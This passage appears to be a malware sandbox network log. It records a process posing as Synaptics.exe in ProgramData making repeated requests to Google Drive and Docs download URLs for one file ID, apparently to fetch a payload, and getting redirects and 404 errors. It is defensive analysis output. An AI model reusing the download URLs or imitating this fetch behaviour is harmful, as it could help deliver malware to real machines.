                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-J9s_9_F69sD6dLIRUWzDjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:29 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                              2024-12-30 10:48:29 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 56 62 56 76 38 57 68 75 33 47 4b 70 75 55 4c 43 6e 75 4f 57 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="UVbVv8Whu3GKpuULCnuOWw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                              2024-12-30 10:48:29 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              98192.168.2.449906142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:29 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:29 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC7DSABYVvgpI16rjiI9YUsrgx7hW2-BlU5W0X5Lf1_46vrorU1XOuGzZhlhA52oJXNqvigII1U
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:29 GMT
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-kb6n-u-EIe6C4EJKz8M1Eg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:29 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                              2024-12-30 10:48:29 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 33 44 6e 47 32 4f 75 4e 41 6f 55 6b 49 75 4c 66 73 36 66 59 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="J3DnG2OuNAoUkIuLfs6fYg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                              2024-12-30 10:48:29 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              99192.168.2.449913142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:29 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:30 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:30 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-hV5MPV5VAn_U1QMi8iGpCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              100192.168.2.449914142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:30 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:30 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:30 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-s6DJaQay2HE4Mv3A6ao3mA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              101192.168.2.449915142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:30 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:30 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC6QCscMYmsa8bGB0mRiEaMsNJwN5TU7hiToufBLqKYHw2nw01MCNgTOtPljUMVuLQCCk6JsFMc
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:30 GMT
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-85a0AfR9hHarJ5NF9Q618Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:30 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                              2024-12-30 10:48:30 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 66 30 5a 30 6c 31 57 6e 4b 34 6c 30 31 39 69 63 59 5f 32 79 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="Hf0Z0l1WnK4l019icY_2yg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                              2024-12-30 10:48:30 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              102192.168.2.449921142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:30 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:30 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC4mBpxEYhLgl5Cs5mrbElvHTfKr4M2cKFLMutf0OkuZ4ZpvYYzH__BKp7zNxO2ts-t4
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:30 GMT
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-boAdy9AJ2PkJn2mayt4JfA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:30 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                              2024-12-30 10:48:30 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 5f 6d 6b 58 43 52 46 32 69 63 4c 33 30 5a 58 72 31 50 41 74 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                              Data Ascii: t Found)!!1</title><style nonce="H_mkXCRF2icL30ZXr1PAtA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                              2024-12-30 10:48:30 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              103192.168.2.449925142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:31 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              104192.168.2.449924142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:31 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              105192.168.2.449927142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:31 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
